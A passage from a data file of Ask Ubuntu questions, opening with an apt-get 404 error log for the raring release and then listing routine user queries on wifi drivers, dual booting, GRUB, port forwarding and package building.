ports.ubuntu.com raring-security/multiverse translation-en ign ports.ubuntu.com raring-security/restricted translation-en_in ign ports.ubuntu.com raring-security/restricted translation-en ign ports.ubuntu.com raring-security/universe translation-en_in ign ports.ubuntu.com raring-security/universe translation-en err archive.ubuntu.com raring/main sources 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring/restricted sources 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring/universe sources 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring/multiverse sources 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring/main armhf packages 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring/restricted armhf packages 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring/universe armhf packages 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring/multiverse armhf packages 404 not found [ ip : 91.189.92.201 80 ] ign archive.ubuntu.com raring/main translation-en_in ign archive.ubuntu.com raring/main translation-en ign archive.ubuntu.com raring/multiverse translation-en_in ign archive.ubuntu.com raring/multiverse translation-en ign archive.ubuntu.com raring/restricted translation-en_in ign archive.ubuntu.com raring/restricted translation-en ign archive.ubuntu.com raring/universe translation-en_in ign archive.ubuntu.com raring/universe translation-en err archive.ubuntu.com raring-updates/main sources 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring-updates/restricted sources 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring-updates/universe sources 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring-updates/multiverse sources 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring-updates/main armhf packages 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring-updates/restricted armhf packages 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring-updates/universe armhf packages 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring-updates/multiverse armhf packages 404 not found [ ip : 91.189.92.201 80 ] ign archive.ubuntu.com raring-updates/main translation-en_in ign archive.ubuntu.com raring-updates/main translation-en ign archive.ubuntu.com raring-updates/multiverse translation-en_in ign archive.ubuntu.com raring-updates/multiverse translation-en ign archive.ubuntu.com raring-updates/restricted translation-en_in ign archive.ubuntu.com raring-updates/restricted translation-en ign archive.ubuntu.com raring-updates/universe translation-en_in ign archive.ubuntu.com raring-updates/universe translation-en err archive.ubuntu.com raring-security/main sources 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring-security/restricted sources 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring-security/universe sources 404 not found [ ip : 91.189.92.201 80 ] err archive.ubuntu.com raring-security/multiverse sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch ports.ubuntu.com/ubuntu-ports/dists/raring-security/main/binary-armhf/packages 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch ports.ubuntu.com/ubuntu-ports/dists/raring-security/restricted/binary-armhf/packages 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch ports.ubuntu.com/ubuntu-ports/dists/raring-security/universe/binary-armhf/packages 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch ports.ubuntu.com/ubuntu-ports/dists/raring-security/multiverse/binary-armhf/packages 404 not found [ ip : 91.189.88.140 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/main/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/restricted/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/universe/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/multiverse/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/main/binary-armhf/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/restricted/binary-armhf/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/universe/binary-armhf/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/multiverse/binary-armhf/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-updates/main/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-updates/restricted/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-updates/universe/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-updates/multiverse/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-updates/main/binary-armhf/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-updates/restricted/binary-armhf/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-updates/universe/binary-armhf/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-updates/multiverse/binary-armhf/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-security/main/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-security/restricted/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-security/universe/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring-security/multiverse/source/sources 404 not found [ ip : 91.189.92.201 80 ] e : some index files failed to download . they have been ignored , or old ones used instead .
499987	unable to locate package jupiter	i 'm trying to install jupiter to maintain the heat in my laptop . however , when i use the following : sudo add-apt-repository ppa : webupd8team/jupiter sudo apt-get update sudo apt-get install jupiter i get this error : e : unable to locate package jupiter how to solve this ? is there any alternative to maintain the heat ?
499988	vnc - black and white hatching	i 'm trying to use tightvnc viewer on my windows machine to login to my ubuntu pc . i 'm running vncserver on ubuntu . i can login ok but all i see is black and white hatching . any ideas ?
499989	reallocated sector count increases when using ubuntu !	when using ubuntu the hard drive makes parking noise ( windows 7 is silent ) . when i use the check disk utility the reallocated sector count tells me 1920 with 48 bad sectors . the 48 bad sectors has n't changed for a long time but the reallocation sector count changes every week . is ubuntu killing my hard drive ? is there anything i can do , apart from buying a new one as they are expensive ? **disk info** disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0006c6a0 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 557341426 278567289+ 7 hpfs/ntfs/exfat /dev/sda3 557344766 976768233 209711734 f w95 ext 'd ( lba ) partition 3 does not start on physical sector boundary . /dev/sda5 557344768 908028993 175342113 7 hpfs/ntfs/exfat /dev/sda6 908029952 976768233 34369141 83 linux
499990	how to control a torrent file to be downloaded item by item	look at this img : generally , transmission tries to download all of items which are defined in a torrent file , concurrently . for example , if we have 10 item in a torrent file , after 1 hour , they can be in a range of 15 % - 50 % of progress ( depending to the rate of download ) . is it possible to force transmission to download items one by one : alphabetically or by sizes , etc . i know i can check/uncheck items manually as you see in the above image , but i 'm asking for a way to do it automatically .
499995	change ip address which is given by tor using the terminal	is there a way to change the ip address which is given by tor from the terminal ? i have the tor service , and i want to change the ip address which tor gives me from the terminal . or in other words : how do i request a new ip address from tor on the command line ?
499996	how to change login screen	after installing kde , i had an ugly splash and login screen that i did n't like . i managed to get the splash back to normal , but i ca n't get the login back to normal .
499997	mir based desktop sharing ?	i am asking this because i am developing a pair programming plugin , and would like to know if mir has any desktop sharing capabilities either planned or already existing . this would be to share built programs , such as console programs or gui programs .
499999	clean re-installation . keep windows	i have ubuntu 14.04 and windows 8.1 dual boot with grub2 . how do i perform a clean re-installation of ubuntu 14.04 without disrupting windows 8.1 . i 'd like to keep windows 8.1 the way as it is . and back using grub2 . is there an easy proper way of doing this ?
500011	'save link as ' / 'open with ' / 'launch application ' window	when i want to open any file or even when i want to do `` save link as '' in mozilla there is a pop up window with the title launch application which i should choose an application to open that file . what is it ? and how i can configure it to not open for mozilla or if it is not possible how to delete it ?
500012	accessing hard drive enclosure through usb	i am trying to get at the files on my old dead computer with the hard drive in an enclosure . it was ubuntu 12.04 . it worked well on my desktop for a while , but i tried to boot to it on my son 's laptop , which did not work and now it does not show up either on the desktop or my new laptop running 14.04 . i have fdisk -l 'd it and it shows up there , but not on the dash or on the file manager . any ideas ?
500014	gtk header files libgtk2.0-dev package paths broken by install directory hierarchy	ubuntu 14.04 desktop i installed the gtk 2.0 dev package using apt-get . i see the header files in /usr/include are inside a directory gtk-2.0 ( /usr/include/gtk-2.0 ) instead of the root include directory . the umbrella header gtk.h includes lots of other headers by path assuming it is in the root . therefore , all the references to header files are broken . if i include the gtk.h by including gtk-2.0/gtk/gtk.h then i get file not found for all the includes inside gtk.h . what is the best way to handle this ? obviously i can move all the headers into the root include directory and into folders as the files expect them ( seems like this should have been done by install ) . or , i can edit all the header files manually to fix the paths ( seems like a real pain ) . what is the best practice for working with these files ? should i make a local copy and add local paths to my include path ? i 'm sure there was a reason for this file layout by the install , but i ca n't think of what it might be ? any guidance about best practice here would be appreciated .
500016	no connectivity from broadcom 4322	while browsing the web i was notified that my dell vostro 1720 was offline . after no luck rebooting my d-link verizon wifi router , i saw my laptop could not connect wirelessly to anything , even a usb dongle . i can only connect to a wired connection now . where do i start in diagnosing this ?
500017	repository/update problems - please help	i should start by saying that i am running elementary os luna , which is a branch of the ubuntu family . you can refer to the screenshot for further reference . rather recently , a little pop up began showing a lot . i can not screenshot what it says for some odd reason , but i will type what it says . `` the update information is outdated . this may be caused by network problems or by a repository that is no longer available . please update manually by clicking on this icon and then selecting 'check for updates ' and check if some of the listed repositories fail . '' the only problem is that there is no 'check for updates ' option , only 'show updates ' , 'show notifications ' , and 'preferences ' . i have went through the update manager and it seems to be okay , but then that pops back up . any clues ? picture reference : was too large to upload here . http : //goo.gl/vvajww
500018	is it possible to disable tcp sequence number checking in ubuntu ?	i want to disable tcp sequence number checking in ubuntu . i suspect that ubuntu is dropping packets as wireshark shows that the packets arrive out of order . is there any such feature in ubuntu or iptables ? if i disable iptables , will it disable tcp sequence number checking too ?
500019	trying to get wifi working in lubuntu 14.04 on inspiron b120	i 'm having a hell of a time getting wifi working on this old laptop . google turns up lots of people having similar problems , but all the answers seem to be from 2010 - 2011 and are n't working for me . this laptop has : network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g it 's supposedly using the broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source , but the only network interfaces i have are lo and eth0 . googling suggests that there 's a conflict with ssb , which is used by b44 , but any attempts to rmmod that result in killing eth0 and no wifi . one step keeps getting me a segmentation fault . i think that step was modprobe wl ... anyway , i 'm working off 3 and 4 year old answers , and they just are n't working . help !
500025	how to install my unity to ubuntu 14.04 ?	how can i install my unity to my ubuntu 14.04 ? the software center finds nothing when i search `` my unity '' . actually i need my unity to enable `` show desktop '' action on the launcher . if there is an alternative way to do this , please recommend me .
500028	problem with exponents ( like a続 )	i use french keyboard setting , when i try to write `` a^3 '' i should click the button `` ^ '' and then the space button to get `` a^3 '' , if i do not click space i get `` a続 '' , which is quite annoying while working on long latex document . do you have any solution for this ? so i do n't have to click the space button each time i click `` ^ '' .
500030	resolving pkg-config to packages	i 'm trying to build something from source , and the configure tells me something like this : checking for foo ... package foo was not found in the pkg-config search path . so i have to go and install the development package for foo ( or whatever ) . normally this is called libfoo-dev , but not always . is there some easy way of looking up the name of the dpkg package for a given pkg-config package ?
500031	booting ubuntu 14.04 in virtualbox	in trying to boot ubuntu 14.04 in virtualbox on windows 7 , i get this message : `` this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot . please use a kernel appropriate for your cpu . '' as a newbie , i 'm completely at a loss ! ! can somebody please help me fix this problem ? eagerly awaiting for help -- any help .
500035	how to play mp4 , restricted codecs already installed ?	so i am a first time ubuntu user as of a week ago , and am having a difficult time getting an mp4 video file to play after i downloaded it . i have downloaded the restricted codecs and also vlc , what else is there that i can do ?
500036	ubuntu 14.04 fails to live boot	back story , skip i recently had a problem where my windows 7 somehow shut down mid update . i almost never shut down my pc and windows decided to update itself . windows 7 was completely dead with no way to recover as i did not have recovery disk . so i decided to shift to ubuntu , everything worked fine for a while , after 2 days i managed to get the company hr to give me a code of windows 8.1 . ( windows 8.1 also was a pain in the butt to install as it kept telling me that the partition was locked ) however i managed to install it . as most of you know , windows kills grub . i was booting windows 8 and it kept crashing my system , when i checked apparently windows 8 does a stress test and my cpu kept over heating as its thermal grease was completely destroyed . i replaced my thermal grease and now windows 8 gives me a bsod every time . and surprise surprise ! my iso for windows is on my system . current problem starts here- now i dont have any os , and only 3 laptops with no dvd drives ( cant write ubuntu on a dvd ) . live booting ubuntu 14.04 with uefi gives me a grub console- gnu grub version 2.02~beta2-9 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions grub > _ and without uefi it gives me the error error : file '/grub/i386-pc/normal.mod ' not found . grub rescue > i have no idea what to do , please help me out . i am completely new to ubuntu and any help would be much appreciated . just to make it clear , i ca n't source a disk for at least 3 days . is there any other work around ? i used unetbootin .
500038	configuring avahi	there is a bug in trusty - when you turn your pc to suspend - the network downs . this is difficult to solve , but i wrote script that runs networkmanger when pc awakes . the network works well , but my lan printer starts making noise . avahi sends some kind of response . deleting avahi-daemon helps , but thats not a solution , i use it for airplay . also disabling airprint feature in printer is unacceptable too . so how to configure avahi , that it wo n't disturb my printer and make awake my family members ? : (
500043	fastest ( low latency ) way to mirror a screen over gb eth	i have 2 computers directly connected via ethernet 1k . wondering what codec in vlc or program would achieve the lowest latency and/or quality . because i 'm going to use synergy to access the screen , i do n't need avlc server/client .
500045	how do i install bem++ ?	i do n't have any experience in using ubuntu but i want to use this software : http : //www.bempp.org/ which unfortunately forced me to use ubuntu . i have installed ubuntu and later when i tried to install the software . ~/desktop/bempp $ python bempp_setup.py -b bempp_setup.cfg but i received this error . bem++ installation failed with error message : could not find the python runtime library in either '/usr/lib ' or '/usr/lib64 ' . specify its location manually by setting the 'lib ' option in the 'python ' section of your configuration file . i would like to get some help in tackling this error . i have installed enthought canopy on my system using this guide : http : //docs.enthought.com/canopyg /quick-start/install_linux.html but it looks like i need to make some modifications so that the software ( bem++ ) can find the python runtime library . i am confused and not sure what to do . please help ! progress so turns out i can specify the location of python runtime library in bempp_setup.cfg like this : include_dir=/usr/include/python2.7 lib=/usr/lib/libpython2.7.so so this brings me to my next question that how do i find out where these files are on my system ?
500046	is there a way to pre-populate the location area in the nautilus `` open file '' or `` save as '' dialogs ?	i wonder if it is possible have nautilus gnome/unity configured to always pre-populate the location area in the `` open file '' or `` save as '' dialogs . i want to pre-populate it with the current directory . copying the current directory to the clipboard see attached screen shots . current state : ( on 14.04 ) : what i want to achieve : nautilus main window does prepopulate the location field with the path : i know there exists a possible workaround with the nautilus-open-terminal extension , but that is not what i 'm asking here .
500049	ubuntu 14.04 high cpu temperature but fans remain silent	i am using ubuntu 14.04 ( 3.13.0-32-generic ) on my new asus n550jk laptop . it has intel i7 4700hq cpu and nvidia geforce gtx 850m graphics card ( i have installed 340.24 driver from xorg-edgers ) . the thing is that the cpu temperature is about 50°c and the fans are so silent that i almost ca n't even hear them working . is this ok or not ? if not how can i fix it ? if it is possible , i would like to lower the temperature below or around 40°c while only surfing the web . here is the output from sensors command while i 'm surfing the web : acpitz-virtual-0 adapter : virtual device temp1 : +52.0°c ( crit = +103.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +53.0°c ( high = +84.0°c , crit = +100.0°c ) core 0 : +50.0°c ( high = +84.0°c , crit = +100.0°c ) core 1 : +49.0°c ( high = +84.0°c , crit = +100.0°c ) core 2 : +50.0°c ( high = +84.0°c , crit = +100.0°c ) core 3 : +50.0°c ( high = +84.0°c , crit = +100.0°c ) asus-isa-0000 adapter : isa adapter temp1 : +52.0°c thanks !
500050	speaker not detected	my headphones works fine . but the speaker is not working [ not detected ? ] even when i have the headphones unplugged . what i did so far was changing the alsa-base.conf by adding these two lines to /etc/modprobe.d/alsa-base.conf and reboot . alias snd-card-0 snd-hda-intel options snd-hda-intel model=asus yet , still not working . i 'm using asus x450ld , according to this , the closest model to mine is the conexant 5066 . although , when i ran aplay -l my soundcard is card 1 : pch [ hda intel pch ] , device 0 : cx20751/2 analog [ cx20751/2 analog ] thank you .
500051	how to run perl script in background	i am new user to ubuntu ... putting & and in the end is putting the application on background , but not really , it still gives me the output of the perl script in my command line even though it is running in background . so it becomes useless as i have to wait for full script to be completed . like : output of perl.. .. .. done . so i still to have to wait till the perl script is executed , is there any way how such type of scripts can be made to run in background so that i do n't have to wait ? i have already tried following : command > test.txt //this generated emptyfile test.txt and all the output is still on command line instead of test.txt command > /dev/null command < /dev/null none of them have been successful . please do n't suggest to open new command line console , by doing ctrl+shift+t or ctrl+alt+t because i do n't wan na do that , i wan na run the perl script in background while doing some work . for other perl scripts , & is working fine but for this one , it is n't , is there any way around ? edit : got the solution thanks to john1024 and volker siegel . command 2 > /dev/null &
500052	ca n't connect to one wifi network , keeps asking for password	here 's the relevant syslog stuff : http : //pastie.org/9405812 here 's the output from the wireless-info script : http : //paste.ubuntu.com/7821949/ my wifi works well in general , i only have problems with this network . the router is a netgear wnr1000v2-vc . it may be possessed . things i 've tried : disabling power management , reboot , satanic ritual , rebooting a second time , giving up , deciding not to give up after all , posting on ask ubuntu
500057	installing ubuntu with an external drive	what i 'm trying to do erase windows and all files from my computer ( i have another computer that stores everything valuable , so i 'm going to use this old computer to experiment with ubuntu and if i like it i 'll switch my other computer later . ) and install ubuntu so that the only thing this computer does is boot to ubuntu . what i have the computer is a toshiba satellite running windows 7 . what i 've done and read so far so i do n't have a usb or the ability to burn cds but i do have what i think is an external hard drive . that 's a thing where you connect through a usb port and back up your files , right ? well , i have that , and i tried following the instructions on the ubuntu website ( http : //www.ubuntu.com/download/desktop/install-ubuntu-desktop ) using the usb instructions as best i could . i downloaded the latest ubuntu distribution , installed the universal usb installer from pen drive , went through their steps for putting the stuff on my external hard drive , left it plugged in , restarted , pressed f12 , and it gave an error `` invalid or corrupt kernel image '' , gave me a prompt that read just `` boot : '' . it would n't escape or quit when i typed `` quit '' so i turned it off and on , restarted , tried it again , and this time after leaving it for a long time it gave me a message saying `` no texts ! '' but when i escaped from that it gave me options like try ubuntu without installing and install ubuntu . i selected install ubuntu but it told me again `` no text '' and above that it read `` /casper/vmlinuz.efi : file not found '' . so i just escaped and restarted again . i looked around on other posts around here that seemed to be asking how to do this but i could n't glean anything useful from them -- so sorry if this is kind of a duplicate . any idea what i should do ? i saw another post mention something called grub -- do i need that ? or is that basically the same as pen drive 's uui ( which is what ubuntu 's website recommended ) ?
500059	packet-o-matic on trusty 14.04	i 'm trying to install pom on trusty and have installed the pre-reqs listed at http : //wiki.packet-o-matic.org/pom/installation but pom ./configure fails to recognize postgresql root # ./configure . . . . configuration result : libpcap : yes xmlrpc-c : yes linux raw socket : yes linux dvb : yes linux tun : yes net-snmp : yes postgresql : no sqlite3 : yes mysql : yes zlib : yes the following postgres packages are installed : root # dpkg -l | grep postgres ii postgresql 9.3+154 ii postgresql-9.3 9.3.4-1 ii postgresql-client-9.3 9.3.4-1 ii postgresql-client-common 154 ii postgresql-common 154 ii postgresql-contrib 9.3+154 ii postgresql-contrib-9.3 9.3.4-1 ii postgresql-server-dev-9.3 9.3.4-1 root # dpkg -l | grep libpq ii libpq-dev 9.3.4-1 ii libpq5 9.3.4-1 the only error i see from the output of ./configure is checking libpq-fe.h usability ... no checking libpq-fe.h presence ... no checking for libpq-fe.h ... no why does n't it find it ? root # find / -name libpq-fe.h -print /usr/include/postgresql/libpq-fe.h
500066	configure port forwarding from localhost : x to z.z.z.z : y without root	our application needs to configure simple port forwarding on runtime . i 'm talking about an iptables configurations like this : iptables -t nat -a postrouting -o eth0 -j masquerade iptables -a forward -p tcp -d 46.165.239.133 -- dport 20000 -j accept -m state -- state new iptables -a prerouting -i eth0 -t nat -p tcp -- dport 20000 -j dnat -- to 45.161.232.131:22222 the rules will be updated multiple times per minute ( with fast reaction times ) . we thought invoking iptables directly from the application , - but this requires root . in sum the mapping should handle 20 to 50 portforwarding . since the servers are our under control , ssh port forwarding would be an option as well . but i think ssh is not made for `` simple port forwarding '' and has to much noise . any idea how to configure that ? or are there tools for this purpose ?
500069	how to check if my wine prefix is 32 bit or 64 bit ?	i saw tons of threads explaining how to create a 32 bit prefix , but i want to check if the prefix i 'm using is 32 bit or 64 bit . the reason i 'm asking is that i 'm using playonlinux , and i 've created a 32 bit virtual drive ( for example x ) . now when i open winetricks in the folder ~/.playonlinux/wineprefix , wineprefix gives me the message you are using a 64-bit wineprefix . if you encounter problems , please retest in a clean 32-bit wineprefix before reporting a bug . but , when i opened wineprefix in ~/.playonlinux/wineprefix/x , the message did n't appear . how can i check if the prefix is 32 vs 64 bit ?
500071	running a .sh to execute multiple commands	i was curious how i would go about running multiple commands via shell script . for example , just to try it out , i 'd like to be able to connect a .desktop to a .sh that will run all the update codes so i do n't have to type it out . i know how to execute a single command via a .sh , not multiple . any way ?
500072	how can i configure multiple maas environments for juju ?	i 've realized a vmaas with 3 vnodes where i deployed juju-gui ( node1 ) and openstack in the other 2 nodes ( node2 , node3 ) . these last ones at moment are in ready status on vmaas . then i 've added other vnodes to vmaas to deploy cassandra and hadoop , i 've already added a new maas environment on environments.yaml called it maassvr02 . but every time i try to bootstrap the new one , juju makes the boot of node3 and not the new vnodes . my question is : which is the right way to realize multiple juju environment like that ? thanks a lot . the solution is to run the following commands : $ : juju sync-tools -e maassvr02 $ : juju bootstrap -e maassvr02 -- to node4.maas -- debug then i 've added also the node5.maas
500074	how to create partition on ssd for booting ubuntu and windows 7	i just completed a computer build , and i installed ubuntu 14.04 on the 250gb samsung ssd that i will be using to boot both ubuntu and windows 7 . i would like to put some other programs on the ssd , and use my 2tb seagate for the rest of my files . when i try booting windows 7 from the cd i created from the .iso , it starts off fine and walks me through the beginning of the installation process until it asks me where i would like windows to be installed . it lists both my ssd and my hdd , but says windows ca n't be installed on my ssd because it 's not the right format , which i believe needs to be ntfs . i 'm not very familiar with creating and managing partitions on drives , but i saw that one could do so by using gparted . unfortunately i have very limited wireless access , so i was wondering if i could do the same through the terminal . so first off , i would like to know how to create a new partition on my ssd , and how to format it so that i could install windows 7 on it . and if you could give me information on how to make all other files automatically save to the hdd by default , and how to save specific programs onto the ssd , that would be much appreciated . thanks in advance
500076	install ubuntu hp mini	i am trying to install ubuntu on my hp mini . i downloaded the 32 bit version , and i have added it to a usb stick . runs on my desktop pc , but it only comes to a black screen with a blinking cursor on it ( on the mini ) . the loading screen does n't show or anything . i have tried re-formatting and replacing the files on the stick . same problem . nothing loads . anyone have any ideas ?
500079	windows 8.1 does not load while dual booting ubuntu 14.04 lts 07/19/2014	i am new to the linux/ubuntu world and i am interested in continuing , but from the beginning i am already having problems with dual booting a preinstalled windows 8.1 with ubuntu . i have a lenovo ideapad p500 touch 64-bit 6gb ram 1tb hard drive preinstalled with windows 8 and a few weeks ago updated to windows 8.1 . i installed ubuntu 14.04 lts on a usb and booted from there . so far ubuntu works perfectly ( i 'm still learning though ) , but windows 8.1 does not load anymore . when i restart my computer these are the options i see : ubuntu ubuntu advanced mode windows boot manager ( on /dev/sda2 ) system setup then when i select windows boot manager ( on /dev/sda2 ) , a black screen appears with this error error : file`/efi/microsoft/boot/bootmgfw.efi ' not found . press any key to continue ... _ i have tried to run boot repair from the terminal by typing boot-repair , but then i get this error : /usr/share/boot-sav/gui-g2slaunch.sh : line 33 : hash : gksudo : not found /usr/share/boot-sav/gui-g2slaunch.sh : line 35 : hash : gksu : not found i have tried to burn boot-repair-64-bit-iso on a cd and boot from it , but there is no option to boot from a cd in the bios . this is some information about my partitions if it helps : name fstype label mountpoint name size owner group mode sda sda 931.5g root disk brw-rw -- -- ├─sda1 ntfs winre_drv ├─sda1 1000m root disk brw-rw -- -- ├─sda2 vfat system_drv /boot/efi ├─sda2 260m root disk brw-rw -- -- ├─sda3 vfat lrs_esp ├─sda3 1000m root disk brw-rw -- -- ├─sda4 ├─sda4 128m root disk brw-rw -- -- ├─sda5 ntfs windows8_os ├─sda5 792.7g root disk brw-rw -- -- ├─sda6 ntfs ├─sda6 450m root disk brw-rw -- -- ├─sda7 ntfs lenovo ├─sda7 25g root disk brw-rw -- -- ├─sda8 ntfs pbr_drv ├─sda8 20g root disk brw-rw -- -- ├─sda9 ├─sda9 1.9g root disk brw-rw -- -- └─sda10 ext4 / └─sda10 89.1g root disk brw-rw -- -- sr0 iso9660 boot-repair-disk 64bit /media/ubu sr0 507.9m root cdrom brw-rw -- -- please respond as simply and in as detailed a fashion as possible . thanks and i appreciate the help in advance ! ! !
500080	running a .sh from a .desktop [ making an icon for minecraft . ]	rather recently , i 've decided to add minecraft to my dock . i play it enough to want it on my dock . i created a .desktop file , and i gave it an icon , name , and such . i figured that point the exec at the .jar would be good enough , but apparently i am incorrect . i decided to make a .sh that would do the same , then point the exec at the .sh . code for the .desktop : [ desktop entry ] type=application name=minecraft exec=/home/bbnorman/.minecraft.sh % u comment=runs minecraft . icon=/home/bbnorman/documents/files/icon.png hidden=false nodisplay=false terminal=false # x-gnome-autostart-enabled=true code for the .sh : # ! /bin/bash echo $ ( /home/bbnorman/documents/files/minecraft.jar ) the .sh works if i use 'bash .minecraft ' in terminal , but simply will not open it via the .desktop . thank you in advance .
500083	download trouble	i 'm running 13.04 , and have started having problems downloading anything through the software center . when i click on a piece of software , there is no description other than : `` available from the `` main source '' '' when i click : `` use this source '' under the progress section it will say that it is updating the cache . shortly after that i get an error message saying that it failed to download the repository information . i do n't know what this means , but i had no problem downloading software just a couple of days ago . i saw that other people fixed the problem by going into the software sources menu and having it select the best source for the download server . when i do this i get another error telling me that no suitable source was found and that i should check my internet connection . i 'm posting this question from the computer in question , so i do n't think my internet connection can be ruled out . when i use sudo apt-get update i get the following error : e : some index files failed to download . they have been ignored , or old ones used instead . i appreciate any help , i 'm pretty new to linux . edit : i did n't realize support for 13.04 was dropped , this may be part of my problem . i had a lot of problems when i installed 14.04 .
500086	install ubuntu at probook 450 g1	i am using a hp probook 450 laptop with running windows 8 on it . i gon na install ubuntu now but i googled about this model and ubuntu i founded some bad results about wireless 's driver please if any one has this model or knows the solution for wireless driver and ubuntu 14.04 please tell me ? ! is probook 450 g1 ( with wirless mediatek ) full compatible with ubuntu 14.04 ? sorry for my bad english
500089	how do i boot ubuntu on an hp envy m6 with windows 8 originally ?	i 'm installing ubuntu on someones computer after repairing it as they asked , but i did not expect to need a password and boot into windows to be able to boot ubuntu . how do i configure it and get it to boot ( it can use grub , i do n't care and neither does he ) from the livecd only as the configuration option ? once i can boot into ubuntu from the hard drive i 'm good
500090	upgrading to the last version of git from the source repository or ppa	i want to upgrade git using the source repository within ubuntu . as you note , the last stable version is 2.0.2 , but i have 1.9.4 . i cloned the git repository , but i 'm not sure how to continue . i want to do that in some way i can understand how to interact with the branches and tags of the repository , so i am not searching solutions of this type .
500093	xfce4-panel xubuntu 14.04 acting very weird	sometimes if i ( left ) click on the open window or menu button on the panel , it becomes right-clicked instead and context-menu appears . switching open windows with alt+tab does n't work . the only thing working is powering off the netbook by unplugging the battery , sometimes right-clicking on desktop brings up the menu from which i can log off or restart but this is not working more often then it is . this happens more frequently now , especially when the machine is connected to the internet ( i wonder if this is relevant with the weird thing ) or left idle for a while . i 'm on xubuntu 14.04 32-bit with the panel set to auto hide to claim some 24 pixels from the screen estate . edit : oh and btw the shutdown button in the menu has become log out .
500095	how to buildmyownkernel , bumping +1 for revision number version ?	i 'm facing a hard time with linux 3.13 from trusty but , it is another topic ( http : //www.mail-archive.com/ubuntu-server @ lists.ubuntu.com/msg06775.html ) , so , i decided to backport the linux 3.16 from utopic . also , i 'll need to sign my linux version with my gpg key and upload it to my ppa later but , first , i am unable to bump +1 to linux revision version ... can someone help me with that ? ! here is the procedure to manually backport it ( which works , as-is , without bumping +1 to revision version ) : instructions from : https : //wiki.ubuntu.com/kernel/buildyourownkernel 1- add utopic 's deb-src to trusty 's sources.list : deb-src http : //us.archive.ubuntu.com/ubuntu/ utopic main restricted universe multiverse 2- run the following commands : mkdir ~/linux/source -p cd ~/linux/source sudo apt-get install fakeroot sudo apt-get build-dep linux apt-get source linux cd linux-3.16.0/ debuild -uc -us cd .. sudo dpkg -i linux-headers-3.16.0-4_3.16.0-4.9_all.deb linux-headers-3.16.0-4-generic_3.16.0-4.9_amd64.deb linux-image-3.16.0-4-generic_3.16.0-4.9_amd64.deb linux-image-extra-3.16.0-4-generic_3.16.0-4.9_amd64.deb 3- done ! linux 3.16 from utopic , compiled and installed into trusty ! first phase okay ... but now , i need to bump its revision version to , something like this : `` 3.16.0-5.0 '' . to sign it with my gpg and upload it to my ppa . then , to achieve this , before compiling and packaging it , i edited the `` debian changelog '' file : cd linux-3.16.0/ vi debian.master/changelog ... to add : linux ( 3.16.0-5.0 ) trusty ; urgency=low [ thiago martins ] * backporting it to trusty -- thiago martins < thiagocmartinsc @ gmail.com.br > sat , 19 